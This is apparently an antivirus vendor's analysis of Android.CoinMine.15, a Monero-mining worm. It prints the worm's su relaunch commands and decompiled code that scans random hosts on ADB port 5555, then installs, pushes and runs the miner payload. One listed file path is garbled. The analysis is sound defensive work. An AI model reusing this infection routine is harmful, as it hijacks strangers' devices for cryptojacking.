Android.CoinMine.15

SHA1: c4e13a96b3eb308f88b3d1e16ea65bffcfb39fb0

The main component of the worm designed to mine the Monero (XMR) cryptocurrency on an infected Android device.

To control its relaunching, droidbot executes the following command: “ps | grep droidbot”. In case the copy of droidbot has already been launched, the second process shuts down. Then application runs “/data/local/tmp/invoke.sh”, and deletes the following files:

/data/local/tmp/invoke.sh
/data/local/tmp/ddexe
/data/local//data/local/tmp/install-recovery.shtmp/debuggerd
/data/local/tmp/install-recovery.sh

Then droidbot checks whether its process has the root privileges. If not, but the “/system/bin/su” or “/system/xbin/su” utilities are located on the computer, droidbot launches its copy using su and shuts down the original process:

su -c /data/local/tmp/nohup /data/local/tmp/droidbot
/data/local/tmp/nohup /data/local/tmp/droidbot

If the process is launched with root privileges, it runs two threads: the first one tries to inject other devices, and the second one checks the “ro.product.cpu.abi” value in “/system/build.prop” in order to detect the bitness of the operating system. Depending on the result, it launches the respective version of the miner: “/data/local/tmp/xmrig64” or “/data/local/tmp/xmrig32”.

The Trojan generates a random IP address and tries to connect to the port 5555 in an infinite loop. It sends a specially generated package and checks the response. If it is successful, the Trojan tries to hack a remote device in the following way:

int __fastcall CheckAndInstall(char *szIP)
{
  char *v1; // r4
  signed int v2; // r5
  v1 = szIP;
  AdbConnect(szIP);
  if ( !AdbGetState(v1) )
  {
    puts("[+] get devices");
    v2 = AdbPsGrep(v1, "droidbot");
    if ( !(AdbCat(v1, "/data/local/tmp/botsuinit_1_1.txt") | v2) )
    {
      puts("[+] our bin is running");
      goto LABEL_5;
    }
    AdbRmRf(v1, "/data/local/tmp/");
    AdbInstall(v1, "/data/local/tmp/droidbot.apk");
    AdbAmStart(v1, "com.android.good.miner/com.example.test.MainActivity");
    AdbPush(v1, "/data/local/tmp/sss", "/data/local/tmp/");
    AdbPush(v1, "/data/local/tmp/nohup", "/data/local/tmp/");
    AdbPush(v1, "/data/local/tmp/bot.dat", "/data/local/tmp/");
    AdbChmod(v1, "/data/local/tmp/sss");
    AdbChmod(v1, "/data/local/tmp/nohup");
    AdbChmod(v1, "/data/local/tmp/bot.dat");
    AdbShell(v1, "/data/local/tmp/nohup", "/data/local/tmp/sss");
    sleep(30);
  }
  AdbDisconnect();
LABEL_5:
  pthread_cond_signal(&unk_348EC);
  return 0;
}

News about the Trojan